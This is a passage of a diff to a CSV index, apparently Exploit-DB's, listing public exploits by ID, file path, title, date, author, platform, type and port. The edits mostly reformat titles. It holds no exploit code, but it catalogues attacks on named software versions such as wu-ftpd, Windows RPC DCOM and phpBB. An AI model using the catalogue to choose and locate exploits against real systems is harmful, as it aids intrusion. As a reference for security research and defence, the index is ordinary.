Exploit",2003-08-01,l0bstah,windows,dos,0 74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 -75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 +75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 -77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 +77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 -79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0 +79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - SYSTEM Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 -83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 +83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 - FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 -90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 +90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel <= 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 -92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 +92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - DoS",2003-09-08,badpack3t,multiple,dos,80 -95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 +95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 -101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 +101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 @@ -107,9 +107,9 @@ id,file,description,date,author,platform,type,port 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 -111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 +111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 -113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 +113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 @@ -117,20 +117,20 @@ id,file,description,date,author,platform,type,port 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0 -121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 +121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 -123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 +123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) (1)",2003-12-02,"Christophe Devine",linux,local,0 -130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 +130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 -135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 +135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 @@ -149,17 +149,17 @@ id,file,description,date,author,platform,type,port 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 -155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 +155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 -163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,anonymous,windows,remote,0 -164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 +163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0 +164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"WS_FTP Server <= 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 -166,platforms/windows/remote/166.pl,"eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 +166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0 @@ -222,33 +222,33 @@ id,file,description,date,author,platform,type,port 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 -234,platforms/bsd/remote/234.c,"OpenBSD 2.6 - / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 -236,platforms/linux/dos/236.sh,"Redhat 6.1 - / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 +236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 -240,platforms/solaris/dos/240.sh,"Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 +240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 -247,platforms/solaris/local/247.c,"Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 +247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 -250,platforms/solaris/local/250.c,"Solaris 7 - / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 +250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 -256,platforms/solaris/local/256.c,"Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 +256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 -262,platforms/hardware/dos/262.pl,"Cisco Multiple Products Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 +262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 @@ -339,7 +339,7 @@ id,file,description,date,author,platform,type,port 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 -365,platforms/windows/dos/365.html,"Microsoft Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 +365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service Exploit (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 @@ -509,7 +509,7 @@ id,file,description,date,author,platform,type,port 657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 -660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 +660,platforms/linux/remote/660.c,"PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0 @@ -646,7 +646,7 @@ id,file,description,date,author,platform,type,port 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 -824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0 +824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit",2005-02-18,class101,windows,remote,21 @@ -703,7 +703,7 @@ id,file,description,date,author,platform,type,port 880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0 -883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)",2005-04-24,cybertronic,windows,remote,2380 +883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2)",2005-04-24,cybertronic,windows,remote,2380 884,platforms/windows/local/884.cpp,"iSnooker <= 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 @@ -814,15 +814,15 @@ id,file,description,date,author,platform,type,port 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad Malewski",windows,dos,0 1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 1003,platforms/php/webapps/1003.c,"Fusion SBX <= 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 -1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2nd updated)",2005-05-20,Nikyt0x,cgi,webapps,0 -1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1st)",2005-05-20,Alpha_Programmer,cgi,webapps,0 +1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 +1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board <= 2.3.1 register.php SQL-Injection Exploit",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox view-source:javascript url Code Execution Exploit",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS Denial of Service Exploit",2005-05-21,"Daniel Hartmeier",multiple,dos,0 1009,platforms/linux/local/1009.c,"Exim <= 4.41 - dns_build_reverse Local Exploit",2005-05-25,Plugger,linux,local,0 -1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3 - perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 -1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2 - php)",2005-05-26,mh_p0rtal,asp,webapps,0 -1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1 - html)",2005-05-26,"Soroush Dalili",asp,webapps,0 +1010,platforms/asp/webapps/1010.pl,"Maxwebportal <= 1.36 password.asp Change Password Exploit (3) (perl)",2005-05-26,Alpha_Programmer,asp,webapps,0 +1011,platforms/asp/webapps/1011.php,"Maxwebportal <= 1.36 password.asp Change Password Exploit (2) (php)",2005-05-26,mh_p0rtal,asp,webapps,0 +1012,platforms/asp/webapps/1012.txt,"Maxwebportal <= 1.36 password.asp Change Password Exploit (1) (html)",2005-05-26,"Soroush Dalili",asp,webapps,0 1013,platforms/php/webapps/1013.pl,"Invision Power Board <= 2.0.3 - Login.php SQL Injection Exploit",2005-05-26,"Petey Beege",php,webapps,0 1014,platforms/php/webapps/1014.txt,"Invision Power Board <= 2.0.3 - Login.php SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller <= 0.6.1 Unauthenticated User Registeration (3rd)",2005-05-27,"Soroush Dalili",asp,webapps,0 @@ -931,7 +931,7 @@ id,file,description,date,author,platform,type,port 1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d <= 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server <= 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server <= 4.60.00 - Remote Denial of Service Exploit",2005-08-01,Kozan,windows,dos,0 -1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 - (Fix-2) Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 +1127,platforms/windows/dos/1127.cpp,"ProRat Server <= 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - (LegitCheckControl.dll) Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1129,platforms/windows/dos/1129.c,"Quick 'n EasY <= 3.0 FTP Server Remote Denial of Service Exploit",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent (dbasqlr.exe) Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 @@ -1122,7 +1122,7 @@ id,file,description,date,author,platform,type,port 1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 - (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0 -1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0 +1352,platforms/windows/remote/1352.cpp,"Microsoft Windows - DTC Remote Exploit (PoC) (MS05-051) (2)",2005-12-01,Swan,windows,remote,0 1353,platforms/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple PreAuth Remote Stack Overflow PoC",2005-12-02,Sowhat,windows,dos,0 1354,platforms/php/webapps/1354.php,"Zen Cart <= 1.2.6d (password_forgotten.php) SQL Injection Exploit",2005-12-02,rgod,php,webapps,0 1355,platforms/linux/remote/1355.pl,"sobexsrv 1.0.0_pre3 Bluetooth syslog() Remote Format String Exploit",2005-12-03,"Kevin 